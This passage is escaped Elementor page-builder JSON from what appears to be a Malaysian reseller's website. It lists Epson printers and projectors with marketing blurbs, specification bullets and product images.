center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"42\",\"right\":\"42\",\"bottom\":\"42\",\"left\":\"42\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2435 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/>\\n\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><br>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6efc9f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2441 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8bce658\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":122,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"4eeb26d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2442 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><br>\\n\\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.\\n\\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em>\\n<ul>\\n \\t<li>High Brightness<\\/li>\\n \\t<li>Beyond Full HD Resolution<\\/li>\\n \\t<li>Powered Lens<\\/li>\\n \\t<li>Portrait Projection<\\/li>\\n \\t<li>Flexible Installation<\\/li>\\n \\t<li>Edge Blending<\\/li>\\n \\t<li>Point Correction<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 